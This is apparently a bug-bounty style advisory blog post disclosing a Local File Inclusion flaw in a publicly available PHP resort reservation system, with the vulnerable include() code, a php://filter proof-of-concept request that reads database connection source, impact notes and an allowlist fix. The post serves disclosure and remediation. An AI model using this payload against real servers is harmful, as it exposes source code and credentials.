R·D Intel

Local File Inclusion in a PHP Reservation System — From Parameter Abuse to Source Code Disclosure | by Cyber Tamarin - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Local File Inclusion in a PHP Reservation System — From Parameter Abuse to Source Code Disclosure A technical analysis of a critical LFI vulnerability in a publicly available PHP application. Cyber Tamarin Follow ~2 min read · March 27, 2026 (Updated: March 27, 2026) · Free: Yes Overview While reviewing publicly available PHP projects, I identified a critical Local File Inclusion (LFI) vulnerability in a Resort Reservation System built with PHP and SQLite3, published on SourceCodester . The issue allows authenticated users to access sensitive application files, disclose source code, and potentially escalate the attack to remote code execution under certain conditions. Affected Application Application : Resort Reservation System (PHP + SQLite3) Vendor/Source : SourceCodester Affected Component : index.php Attack Surface : page parameter Vulnerability Type CWE-98: Improper Control of Filename for Include/Require Statement Severity CVSS v3.1 Base Score : 8.8 (High) Vector : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N Description The Resort Reservation System application is vulnerable to Local File Inclusion (LFI) due to improper handling of user-supplied input in the page parameter. The application directly incorporates the page parameter into a PHP include() statement without validation or sanitization: $page = $_GET['page'] ?? 'home'; include($page . ".php"); An authenticated attacker can manipulate the page parameter to include unintended files using PHP stream wrappers such as php://filter . This allows disclosure of sensitive source code files by bypassing the enforced .php extension through encoding filters. Proof of Concept (PoC) Request http://localhost:8000/?page=php://filter/convert.base64-encode/resource=DBConnection Result The server returns the base64-encoded contents of DBConnection.php Decoding the output reveals the full source code of the file Impact An authenticated attacker can exploit this vulnerability to: Read arbitrary PHP source files on the server Access sensitive application components such as: DBConnection.php auth.php login.php Master.php Extract database credentials and internal application logic Obtain password hashes (e.g., bcrypt hashes of administrative users) Additionally, this vulnerability may be leveraged to achieve Remote Code Execution (RCE) through techniques such as log poisoning or inclusion of attacker-controlled files. Attack Vector Access Level : Authenticated user (low privilege) Attack Complexity : Low User Interaction : None required Root Cause The vulnerability arises from: Direct use of user-controlled input in include() Lack of input validation or sanitization Absence of an allowlist mechanism for permitted files Remediation To mitigate this issue: Implement a strict allowlist of permitted pages $allowed_pages = [ 'home','rooms','fees','reservations', 'users','manage_room','manage_reservation', 'manage_user','update_account','view_room', 'view_reservation','view_fee','reports' ]; $page = in_array($_GET['page'] ?? '', $allowed_pages) ? $_GET['page'] : 'home'; include($page . '.php'); 2. Avoid using user input directly in file inclusion functions 3. Use absolute paths for includes where possible 4. Disable unnecessary PHP stream wrappers (if applicable) 5. Apply principle of least privilege for file access #bug-bounty #cybersecurity Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).